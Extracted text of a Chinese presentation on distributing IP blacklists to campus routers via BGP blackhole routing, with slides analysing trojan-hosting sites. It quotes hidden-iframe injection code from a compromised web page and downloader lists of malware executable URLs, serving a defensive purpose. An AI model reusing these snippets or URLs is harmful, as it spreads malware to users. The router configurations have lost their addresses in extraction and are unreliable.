版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
基于BGP协议的
IP黑名单分发系统编辑ppt主要内容IP黑名单介绍基于BGP协议的IP黑名单分发系统结构接收黑名单的路由器配置测试情况结语2023/4/152编辑pptIP黑名单介绍IP黑名单(IPblacklist)是指被设置成禁止通信的IP地址。管理完备的网络中,往往会设置IP黑名单列表。发往IP黑名单的数据包,不会被正常地转发被丢弃(称为blackholeroute,即黑洞路由,一般是送到Null0空接口)或发送到特殊的目的地(称为sinkhole路由,送到专门的流量处理设备进一步处理)。IP黑名单的应用,可以显著的减轻DDoS攻击的危害,也可以减慢网络蠕虫的传播。2023/4/153编辑pptIP黑名单介绍(2)如最近年很多校园网都受到很多木马程序的影响。目前反向连接的木马占主流,并且多采用被动传播方式。木马下载网站是木马传播的主要途径,木马程序利用网站做跳板传播或更新。一旦把这些网站IP地址添加到IP黑名单,禁止正常计算机与它的通信,这些木马程序的传播就无法进行,很快就能抑制住校园网内木马程序的传播,ARP欺骗等影响网络稳定的事件在校园网明显减少。同样可以减少黄色网站、钓鱼网站等的影响。2023/4/154编辑ppt恶意网站的实例内嵌恶意代码的网站多用于被动传播木马浏览器访问时,如果存在漏洞,会自动下载木马软件等恶意软件,在用户后台执行通常利用flash、realplayer、windows下的漏洞这些网站往往会被嵌入到正常的网站上,俗称被“挂马”恶意代码中转站为了帮助木马程序的更新,设立一些下载网站,木马程序启动后,自动下载最新的程序代码2023/4/155编辑ppt一个“挂马”例子深圳职业技术学院汽车与交通学院/ReadNews.asp?NewsID=809这个网页中有下面一段代码<scriptsrc=/1.js>1.js内容是<iframesrc=/a0076159/a07.htmwidth=100height=0></iframe>/a0076159/a07.htm的内容是<iframewidth=100height=0src=new.html></iframe>new.html是利用几个媒体播放漏洞下载恶意软件的代码2023/4/156编辑ppt一个“挂马”例子[wide]/[script]/ads/gb.js[frame]/a11.html[frame]/index.html[frame]/fl.htm[frame]/i11.html[frame]/cx.htm[object]/bak.css[frame]/06014.htm[object]/bak.css[frame]/I7.htm[object]/yg.exe[frame]/ff.htm[object]/bak.css[frame]/real10.htm[object]/bak.css[frame]/real11.htm[object]/bak.css[script]/855299/ystat.js最近利用IE70day攻击的恶意程序2023/4/157编辑ppt一个网站被挂了多个“马”LogisgeneratedbyFreShow.
[wide]/
[script]/include/javascript/common.js
[frame]/b7.htm?a023
[frame]/flash.htm
[frame]/14.htm
[frame]/office.htm
[frame]/lz.htm
[frame]/re10.htm
[frame]/re11.htm
[frame]/fs/7.htm
[frame]/a192/fxx.htm
[frame]/a192/fx.htm
[frame]/a192/ilink.html
[frame]/a192/flink.html
[frame]/a192/ss.html
[frame]/a192/ms06014.htm
[frame]/a192/GLWORLD.html
[frame]/sina.htm
[frame]/UU.htm
[frame]/a192/Thunder.html
[frame]/a192/real.htm
[frame]/a192/Real.html2023/4/158编辑ppt恶意代码中转站感染病毒的机器会下载/1234.txt
这个文件内容是
[oo]
c0=http://1.111991.net/0.exe
c1=http://1.111991.net/1.exe
c2=http://1.111991.net/2.exe
c3=http://1.111991.net/3.exe
c4=http://1.111991.net/4.exe
c5=http://1.111991.net/5.exe
c6=http://1.111991.net/6.exe
c7=http://1.111991.net/7.exe
c8=http://1.111991.net/8.exe2008年5月5日开始关注类似的访问序列2023/4/159编辑ppt恶意代码中转站(2)/ko.txt内容是:[file]open=yurl1=http://111./new/new1.exeurl2=http://111./new/new2.exeurl3=http://111./new/new3.exeurl4=http://111./new/new4.exeurl5=http://111./new/new5.exeurl6=http://111./new/new6.exe2023/4/1510编辑ppt获取以上信息的方式某些安全论坛,如
/bbs/forum-31-1.html/forumdisplay.php?fid=22/report.asp从校园网对外访问的日志中分析查找访问较明显序列的日志,如1.exe2.exe3.exe发现可疑的URL,可以把下载的文件提交给/
测试,检查是否是恶意软件通过以上方式,经过几个月的累计,我们已经搜集了700余条IP黑名单2023/4/1511编辑ppt恶意网站的一般封堵方法客户端封堵某些浏览器或个人防火墙在访问恶意网站的时候,会给出提示,并阻挡访问校园出口封锁防火墙检测到下载恶意软件时可以阻挡IPS入侵防御系统可以阻断管理员手工增加黑名单路由,更新复杂,维护成本高网络主干封锁增加黑名单路由,发往这些地方的数据包被丢弃教育网主干增加了约150条黑名单路由,禁止对这些IP的访问但由于大部分学校都用其他出口,因此封堵效果一般2023/4/1512编辑ppt教育网主干网黑名单路由例子hef1-bgw>showiproute|incB9[200/70]via,2d11hB96[200/70]via,2d11hB19[200/70]via,2d11hB36[200/70]via,2d11hB36/32[200/70]via,2d11hB04/32[200/70]via,2d11hB89/32[200/70]via,2d11hB13/32[200/70]via,2d11hB32[200/70]via,2d11hB34/32[200/70]via,2d11hB3/32[200/70]via,2d11h2023/4/1513编辑ppt在路由器上封锁IP的方式首先在路由器上增加null0路由iproute55null0把要封锁IP的下一跳设置为,如要封锁3,有两种方式直接手工增加静态路由 iproute355
需要在所有路由器上增加利用BGP注入路由(远程触发黑洞路由,Remote-TriggeredBlackHoleRouting
)在一个触发路由器上增加,利用BGP广播给其他路由器做法可以参考/3c6vl7(WormMitigationTechnicalDetails
)2023/4/1514编辑ppt远程触发黑洞路由优缺点优点在一台触发路由器上配置,自动广播到其他路由器,使用方便数据包是在最近的路由器上丢弃缺点手工修改配置比较麻烦无法有效的跟踪相关信息(如:什么时候增加的,增加的原因)无法自动删除黑名单,必须要手工删除总之,管理员比较辛苦2023/4/1515编辑ppt基于BGP协议的
IP黑名单分发系统黑名单信息存放在数据库中黑名单信息管理方式管理员通过Web界面添加/删除黑名单程序与入侵检测系统自动进行添加/删除管理员在添加时可以设置有效期,到期后自动删除通过一个简单的BGP客户端,把数据库里的黑名单信息发送给路由器剩下的操作与传统远程触发黑洞路由完全一样2023/4/1516编辑ppt系统结构WEB界面管理数据库路由服务器路由器BGP协议管理员BGP协议2023/4/1517编辑ppt简化的BGP客户端程序BGP很复杂,但是BGP的协议很简单每条消息不能超过4096字节消息头固定19字节4种消息类型OPEN建立tcp连接后发送,协商一些参数UPDATE增加或撤回路由NOTIFICATION出错时KEEPALIVE定时发送2023/4/1518编辑pptUPDATE广播增加路由信息例如增加一条路由73/32003802
消息长度56(0x38)字节,类型UPDATE(02)0000Withdraw信息长度为0(无withdaw路由)001CTotalPathAttributeLength=28(0x1c)字节400100ORIGIN:IGP400200ASPATH:空400304C0000201NEXT_HOP:80040400000014MED2040050400000054Local_Pref10020前缀长度32DEBFFBAD732023/4/1519编辑pptUPDATE广播撤回路由信息例如撤回一条路由73/32001C02
消息长度28(0x1c)字节,类型UPDATE(02)0005WithdrawnRoutesLength=520
前缀长度32DEBFDBAD730000TotalPathAttributeLength=0字节2023/4/1520编辑ppt接收黑名单的路由器配置WEB界面管理数据库路由服务器路由器BGP协议BGP协议备用路由服务器BGP协议2023/4/1521编辑ppt接收IP黑名单路由器上的配置routerbgp65500
nosynchronization
bgplog-neighbor-changes
neighbor7remote-as24362
neighbor7ebgp-multihop255
neighbor41remote-as24362
neighbor41ebgp-multihop255
noauto-summaryiproute55Null0iproute755next_hopiproute4155next_hop注:65500是自治域号,随便使用一个号就可以Next_hop是到741的网关741是路由服务器IP2023/4/1522编辑pptBGP连接正常的信息#showipbgpneighborsBGPneighboris7,remoteAS24362,externallinkBGPversion4,remoterouterID7BGPstate=Established,upfor6d01h…SentRcvdPrefixactivity:--------PrefixesCurrent:0699(Consumes33552bytes)PrefixesTotal:0700ImplicitWithdraw:00ExplicitWithdraw:01Usedasbestpath:n/a6602023/4/1523编辑pptBGP连接正常的信息(2)#showipbgpBGPtableversionis703,localrouterIDis1Statuscodes:ssuppressed,ddamped,hhistory,*valid,>best,i-internal,SStaleOrigincodes:i-IGP,e-EGP,?-incompleteNetworkNextHopMetricLocPrfWeightPath*43/32024362i*>024362i*7/32024362i*>024362i*0/32024362i*>024362i*1/32024362i*>024362i2023/4/1524编辑ppt测试情况2008年7月开始在中国科大校园网使用这样方式来管理黑名单,有安徽4所大学,省外3所(东北大学、兰州大学、电子科大)在使用这个黑名单目前
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 中性树脂购买合同范例
- 建围墙 合同模板
- 居室装潢工程施工合同范例
- 官田房屋租赁合同范例
- 就业保密合同模板
- 重症医学科感染控制总结
- 户外拓展活动租赁合同范例
- 协议钢板销售合同模板
- 建设工程安装合同范例
- 工厂补差价合同范例
- SB/T 10614-2011熟制花生(仁)
- GB/T 4257-2004扩孔钻技术条件
- GB/T 30790.6-2014色漆和清漆防护涂料体系对钢结构的防腐蚀保护第6部分:实验室性能测试方法
- GB/T 27588-2011露酒
- GB/T 18833-2012道路交通反光膜
- GB/T 15063-2020复合肥料
- GB/T 12767-1991粉末冶金制品表面粗糙度参数及其数值
- 老旧小区改造征求居民意愿表(样表)
- 年金险的销售逻辑课件
- 高效能人士的七个习惯讲义-习惯5 知彼解己课件
- 意义类答题方法
评论
0/150
提交评论